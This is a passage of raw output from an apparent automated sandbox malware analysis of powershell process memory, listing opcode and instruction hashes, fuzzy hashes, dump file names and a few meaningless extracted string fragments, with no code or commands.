                                                                                                                                                                        • Opcode Fuzzy Hash: a7033afcfcc4563fb525930ae5d97f3651e9eb7059748241969d685bbd5eaf72
                                                                                                                                                                        • Instruction Fuzzy Hash: E7F0E23A7083501BCB0A2675B8582BD3B92ABC6334B080066D50587381CE68190A83B6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 6d5e7f045e7cc80beb348e7a4c5f0fdcb6bd2a112619411f4ed00e30fbe0e6de
                                                                                                                                                                        • Instruction ID: b9891e83eb6c158de2733317946e86cee3033afbf1a0bb3cc1e3d1878c9fd7aa
                                                                                                                                                                        • Opcode Fuzzy Hash: 6d5e7f045e7cc80beb348e7a4c5f0fdcb6bd2a112619411f4ed00e30fbe0e6de
                                                                                                                                                                        • Instruction Fuzzy Hash: 8BF027B96005085BE710AB68C0187ABB797DBC1728F10816ACD0A57784CE3A2906CBD2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 85ed8c791441733ce77bd89f909fe78a973f1eeee5bf8c2ad05b0429963ff8b3
                                                                                                                                                                        • Instruction ID: f4a8ec6875bd005d3c83ab5e0c348d151ae65451055edd24af5e8a0df8bad151
                                                                                                                                                                        • Opcode Fuzzy Hash: 85ed8c791441733ce77bd89f909fe78a973f1eeee5bf8c2ad05b0429963ff8b3
                                                                                                                                                                        • Instruction Fuzzy Hash: 6FF0A7793001188FCB10D7ADD8046AAB7E7EFCC6557054155E509CB310DF24CC018B91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 615eb9769bfb7a08850813ce2b7924ed0be2c9a00e6eea6dc27456e2fc61a7da
                                                                                                                                                                        • Instruction ID: 8478df14940c4c3eee969b06d81c6536f56e2a1888cc205629cbfde74ec63941
                                                                                                                                                                        • Opcode Fuzzy Hash: 615eb9769bfb7a08850813ce2b7924ed0be2c9a00e6eea6dc27456e2fc61a7da
                                                                                                                                                                        • Instruction Fuzzy Hash: A0E0ED393005108F82109B5DD458C66B7EAEFCE61571514A9E585CB721DB62EC019B90
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 72d8caa4931247bf914cc8ec04b531075fd5c012601e11a8b9bff46d5d56bdd4
                                                                                                                                                                        • Instruction ID: 4dffab3d2411fa58c43b09c8189318f22ff3acbe27f8dc25a793ac12fb1daa89
                                                                                                                                                                        • Opcode Fuzzy Hash: 72d8caa4931247bf914cc8ec04b531075fd5c012601e11a8b9bff46d5d56bdd4
                                                                                                                                                                        • Instruction Fuzzy Hash: FFE026737893D10F8716856EA818066BFFB8BC323030941FBE041CB346DD128D158396
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b14685c5484a74f2e4850a988d343bfdc5bde584dfabfbb90264409d36b8e4e0
                                                                                                                                                                        • Instruction ID: 83e1fe1a94ce24a3a9284da9495fadd6bac70762be72a55b51dee321af3175ac
                                                                                                                                                                        • Opcode Fuzzy Hash: b14685c5484a74f2e4850a988d343bfdc5bde584dfabfbb90264409d36b8e4e0
                                                                                                                                                                        • Instruction Fuzzy Hash: 28F06D709003048BD7609F78E8DC7AABBE9FB44320F004429E14EC7340DB396881CB90
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: ca45083c6fd8dd58746215663ddf5177f1515254f37f0c92e6b9f190e2ab8eaa
                                                                                                                                                                        • Instruction ID: fbbfb01e420dfdbe41342e4197f568a961897620b0c75eae1f35f88913bfda5f
                                                                                                                                                                        • Opcode Fuzzy Hash: ca45083c6fd8dd58746215663ddf5177f1515254f37f0c92e6b9f190e2ab8eaa
                                                                                                                                                                        • Instruction Fuzzy Hash: 25E01274C012499F8B80EFB998465AAFFF4EB09204B2085AEC919D7211EA3256168BE1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b693401e57e16fb0c181663a75d8f804d0c76ff7015ea72cd33ce06af3508d2d
                                                                                                                                                                        • Instruction ID: 093a7338fe4dc6825640589938a84fe6589f419367ffcbd6f7e169398c8a2c7b
                                                                                                                                                                        • Opcode Fuzzy Hash: b693401e57e16fb0c181663a75d8f804d0c76ff7015ea72cd33ce06af3508d2d
                                                                                                                                                                        • Instruction Fuzzy Hash: 18E0DF35B0421057CB082778A80C2BE7A96BBC4734F04002AD60A83340CF78290287EA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 5b025e04a3463747d6e734d1d95ad0bb3cbd56537de14f150075d033f8407ce3
                                                                                                                                                                        • Instruction ID: 6d319b688db593480ff1e476cfdd01a305ea2a797faeea1664b919422a9fb1c3
                                                                                                                                                                        • Opcode Fuzzy Hash: 5b025e04a3463747d6e734d1d95ad0bb3cbd56537de14f150075d033f8407ce3
                                                                                                                                                                        • Instruction Fuzzy Hash: F4D0A7D27022252B5F6430FE19187BBE1CFCEC55E070501369E15C7341ED55DC0507E1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                        • Instruction ID: 5a7d9eaab86b2ef4bc0f17b8fe03f8febdcf7ed4d8697e785d1303b2fe2ac736
                                                                                                                                                                        • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                        • Instruction Fuzzy Hash: CCE08631B100149B8B08959DD4144E9F7A5DFCC220F04847BD91AA7340DA325916C6E1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0f50fe6b7df1f7338d0d33b3ac6e78295547683cdeb60f405c0c641dd698d010
                                                                                                                                                                        • Instruction ID: 892ad39f637e5e2598293c5fec4b202d424cc57c6f027e720d4ca9c426940549
                                                                                                                                                                        • Opcode Fuzzy Hash: 0f50fe6b7df1f7338d0d33b3ac6e78295547683cdeb60f405c0c641dd698d010
                                                                                                                                                                        • Instruction Fuzzy Hash: 40E0C275700B18078212666EA81496F77DBDFC4AB2300446EE02DC7300DF65DC0687E6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 5e59ddaeb030aaa2b10ce8bace5cbb755c913e2ae1e6d165372de6d867b1b4b3
                                                                                                                                                                        • Instruction ID: 7d4ee0791db449784eea7dbd9ba15aba0ef08580070cb526ddcf5064a97beeb0
                                                                                                                                                                        • Opcode Fuzzy Hash: 5e59ddaeb030aaa2b10ce8bace5cbb755c913e2ae1e6d165372de6d867b1b4b3
                                                                                                                                                                        • Instruction Fuzzy Hash: 92E04F35C4420A8BCB09AFA4E80E8ADBF70FB00321B400269D94392281EA35665ACFC5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 087612e573f10abb6d9ddd3ed72f8febea0ced7411c6db9265de1756a4bf0715
                                                                                                                                                                        • Instruction ID: 7a17a025a5ce94c367cc18698e66c0236fbad151e2185e3e2ab3b773de9d733b
                                                                                                                                                                        • Opcode Fuzzy Hash: 087612e573f10abb6d9ddd3ed72f8febea0ced7411c6db9265de1756a4bf0715
                                                                                                                                                                        • Instruction Fuzzy Hash: DCE08675D4820A9BC714DFA4E8879B9BFF0FB05315F004665DD4593740EA326845CBC5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                        • Instruction ID: d8cf1a3db24bd4e63e9d2d1af7a9f330abf9afe764410b37e76c0280e1ab0cb9
                                                                                                                                                                        • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                        • Instruction Fuzzy Hash: 1FD067B0D0420D9F8B80EFADD94156EFBF4EB48214F6085AE8919E7311E7329A12CBD1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0b2b342af9faf9683de5c02c7ae2bfc79f6e3b34ec75648489a96ee884a5bc3e
                                                                                                                                                                        • Instruction ID: 4a3db4e51dd9f9538eaf0ce2fa8c76593d25358ea5d551c0a0efaf79fcd7887f
                                                                                                                                                                        • Opcode Fuzzy Hash: 0b2b342af9faf9683de5c02c7ae2bfc79f6e3b34ec75648489a96ee884a5bc3e
                                                                                                                                                                        • Instruction Fuzzy Hash: BAD06735C041098BCB08ABA4EC5B8BDBB74FB14311F404169D90752291EA356A5ACAC5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 88fe51caeb64fda6c9319fb48b7707bf99f7c979a97a3c9251a89b16b7bb45c3
                                                                                                                                                                        • Instruction ID: 6af9637f895ab583df37799dcfa1a693a19fbf9fb377131d5fad73e15898d1ed
                                                                                                                                                                        • Opcode Fuzzy Hash: 88fe51caeb64fda6c9319fb48b7707bf99f7c979a97a3c9251a89b16b7bb45c3
                                                                                                                                                                        • Instruction Fuzzy Hash: F9D01735E0820A9BCB18EFA4E84A86EBBB4BB45300F004169DD4A93350EA306801CBC1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d9fb6c5df58fa8c73456041872d8fb086c583d6a806c0c384ec4ba95c0794ca6
                                                                                                                                                                        • Instruction ID: 2099163bf157cde6ed6b475eaf649c98eb43edaf604bd9f4db9649459750ceed
                                                                                                                                                                        • Opcode Fuzzy Hash: d9fb6c5df58fa8c73456041872d8fb086c583d6a806c0c384ec4ba95c0794ca6
                                                                                                                                                                        • Instruction Fuzzy Hash: A3D012B64483849BCB165F74D4C9A483F61AF12295B0405DCD88B4A293CD37C049CF41
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: ffb495d7c0733d055bdc9bc1d9f035013ee7235cf7688d7ca4e2b91bfc0d5742
                                                                                                                                                                        • Instruction ID: 7e5158c858d566c6f88d9dfe1a70fea0c3f82e88e137d401308f7b5794d89172
                                                                                                                                                                        • Opcode Fuzzy Hash: ffb495d7c0733d055bdc9bc1d9f035013ee7235cf7688d7ca4e2b91bfc0d5742
                                                                                                                                                                        • Instruction Fuzzy Hash: 28C04C669192404FEF48DB358866B267A729746A05B07C1AD908286851DD24440ADA01
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 8d7c088e97c18d7e5437f687182b4d78bb111a687a9fc65df4bba3efbb910027
                                                                                                                                                                        • Instruction ID: dc6e10669132b74380fee5247ff79d64743616223f68abc117dd1bbd5bd393f0
                                                                                                                                                                        • Opcode Fuzzy Hash: 8d7c088e97c18d7e5437f687182b4d78bb111a687a9fc65df4bba3efbb910027
                                                                                                                                                                        • Instruction Fuzzy Hash: 46B092310487098FC2496F75E4488157329BF4421938008A8E90E0A292CE37E889CA45
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1770559728.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7120000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: $cqk$4'^q$4'^q$4'^q$4'^q$84|l$84|l$piFk$tP^q$tP^q$r~l$r~l
                                                                                                                                                                        • API String ID: 0-2175947571
                                                                                                                                                                        • Opcode ID: 2a103190f8186a7c5ab3475e3d21a1a28287a77b72b8465a3cc4e473eb09fef9
                                                                                                                                                                        • Instruction ID: 17a1db41646de82f1e391a95d1777152d071a2004f0af76e2aa2f2f47f9aae2b
                                                                                                                                                                        • Opcode Fuzzy Hash: 2a103190f8186a7c5ab3475e3d21a1a28287a77b72b8465a3cc4e473eb09fef9
                                                                                                                                                                        • Instruction Fuzzy Hash: A0D16DB1B0422EEFCB26CB68840466ABBF2AFC5311F15846BD5158B2D1DB31C867E791
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1770559728.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7120000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$tl$tl
                                                                                                                                                                        • API String ID: 0-4116796712
                                                                                                                                                                        • Opcode ID: 8ba1f4b49e85cac18756c76e30506931d2f253b8cf52ed66ca75f433092cca63
                                                                                                                                                                        • Instruction ID: dedf53e05fbd0c955b2acd3682328158d27320cca554892b130576e3c80ba6e3
                                                                                                                                                                        • Opcode Fuzzy Hash: 8ba1f4b49e85cac18756c76e30506931d2f253b8cf52ed66ca75f433092cca63
                                                                                                                                                                        • Instruction Fuzzy Hash: D5A189B27043658FCB2A8B698805766BBF2AFC6710F1480BBD555CB2D1CB39C863D361
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1770559728.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7120000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: fcq$4'^q$4'^q$4'^q$4'^q$r~l$r~l
                                                                                                                                                                        • API String ID: 0-1826034293
                                                                                                                                                                        • Opcode ID: f2a707b206769c929af3c62ef46776aa591cfd623ed1f4c4107a18fed8945f0c
                                                                                                                                                                        • Instruction ID: c81d50094155ac7c2d8073b3820ffc8882d92b68c0f94ae12aa0d2baa6459338
                                                                                                                                                                        • Opcode Fuzzy Hash: f2a707b206769c929af3c62ef46776aa591cfd623ed1f4c4107a18fed8945f0c
                                                                                                                                                                        • Instruction Fuzzy Hash: 20F198B17042658FCB258B78841576ABFA2AFCA311F14C1BAD54ACB282CB31DC53D7A1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1770559728.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7120000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 4'^q$4'^q$$^q$$^q$$^q$tl$tl
                                                                                                                                                                        • API String ID: 0-750435783
                                                                                                                                                                        • Opcode ID: 0a91e5d5a9ea016b05e4a160b5b5cc2599640dd2b38aa949f377d17e500415ce
                                                                                                                                                                        • Instruction ID: 255124915b972bbcc51f0aacf72e2eae99dc38f4d141ef14454ab80ce2570ebe
                                                                                                                                                                        • Opcode Fuzzy Hash: 0a91e5d5a9ea016b05e4a160b5b5cc2599640dd2b38aa949f377d17e500415ce
                                                                                                                                                                        • Instruction Fuzzy Hash: D45168F17043268FCB2A5A698402766BBF2AFC6611F14806BD465CF2C1DF39C867D7A1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: tM~l$`_q$`_q$`_q$`_q
                                                                                                                                                                        • API String ID: 0-4175844202
                                                                                                                                                                        • Opcode ID: 48e8c9c227590b71146ca53adb92e20e0948786bb68c3ca17c7bab2e47bf537b
                                                                                                                                                                        • Instruction ID: 695c26571778392c4d79d9788feaa233f4c8bce844990c2a39cdf65da4e62b4e
                                                                                                                                                                        • Opcode Fuzzy Hash: 48e8c9c227590b71146ca53adb92e20e0948786bb68c3ca17c7bab2e47bf537b
                                                                                                                                                                        • Instruction Fuzzy Hash: 6EB19474E002199FDB54DFA9D990A9EFBF2FF48304F108629E819AB314DB30A945CF91
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: tM~l$`_q$`_q$`_q$`_q
                                                                                                                                                                        • API String ID: 0-4175844202
                                                                                                                                                                        • Opcode ID: dfc36595498dc4255e73732cf6ae6ae56c759f8728e0738bfb0aa76d36fb8146
                                                                                                                                                                        • Instruction ID: de35fa92a3d93c606870830abff9d7ff0a1b090dae00e5a59bf9a542807df86d
                                                                                                                                                                        • Opcode Fuzzy Hash: dfc36595498dc4255e73732cf6ae6ae56c759f8728e0738bfb0aa76d36fb8146
                                                                                                                                                                        • Instruction Fuzzy Hash: B4B18374E002199FDB54DFA9D990A9EFBF6FF48304F108629E819AB314DB30A945CF91
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: tM~l$`_q$`_q$`_q$`_q
                                                                                                                                                                        • API String ID: 0-4175844202
                                                                                                                                                                        • Opcode ID: b2078bccadce342ac4d26b0046c099685e3cdfafa2bdd8bde7a1da808d998e89
                                                                                                                                                                        • Instruction ID: 17afd6ce2a67f9ad68310bb59c98dc3561f4e7cf45053a5e5ee72c4c3314654a
                                                                                                                                                                        • Opcode Fuzzy Hash: b2078bccadce342ac4d26b0046c099685e3cdfafa2bdd8bde7a1da808d998e89
                                                                                                                                                                        • Instruction Fuzzy Hash: 3DB19374E002199FDB54DFA9D990A9DFBF2FF48304F108629E819AB315EB31A945CF90
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1770559728.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7120000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                        • API String ID: 0-2125118731
                                                                                                                                                                        • Opcode ID: be533b48b5e362c659225cf66baa72fc9aec472f301494bdd8b591165113be12
                                                                                                                                                                        • Instruction ID: 267628e04ab6076f56371a1f7d672e556c089f6ce4e93a6d839c21c786d7d2db
                                                                                                                                                                        • Opcode Fuzzy Hash: be533b48b5e362c659225cf66baa72fc9aec472f301494bdd8b591165113be12
                                                                                                                                                                        • Instruction Fuzzy Hash: EA214CB27003269BDB28197B8882737B7D75BC0711F64847AE605CB3C5DF75C8629361
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1770559728.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7120000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                        • API String ID: 0-2049395529
                                                                                                                                                                        • Opcode ID: 0dbcbdf49134b22ea462f98f228c2e5ed9b694acad2d882a1897e7354ed26611
                                                                                                                                                                        • Instruction ID: ea09c74bb02b3d20625384f0ab68303aa8d267783b5a275195fc932a2fe77b58
                                                                                                                                                                        • Opcode Fuzzy Hash: 0dbcbdf49134b22ea462f98f228c2e5ed9b694acad2d882a1897e7354ed26611
                                                                                                                                                                        • Instruction Fuzzy Hash: 6E01D66170D7664FC72F062809242666FF25FC7A11B1A46D7C081CF2D6CE245D8B87AB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1818441848.000000000401D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0401D000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_401d000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 29ab95be87bdfda51ce3c589971178460e0faf538ccd5948077cabff1d9ddcd4
                                                                                                                                                                        • Instruction ID: 5a00f975788f8f7de427d213281b0294d61c585f8bb39617870cc772f516f8bd
                                                                                                                                                                        • Opcode Fuzzy Hash: 29ab95be87bdfda51ce3c589971178460e0faf538ccd5948077cabff1d9ddcd4
                                                                                                                                                                        • Instruction Fuzzy Hash: DE01F272508340AAE7618E29ECC4B67BFD8DF51325F08C41AED492B292C778B841D7B2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1818441848.000000000401D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0401D000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_401d000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: be98aba16e34e34fbdb812e2244839e446987e981b28687a2e65f68367fce574
                                                                                                                                                                        • Instruction ID: ed56f3c4a15ea696d8a56fd0d41107f4d0294f8feff462b94a1d29b9d9045e57
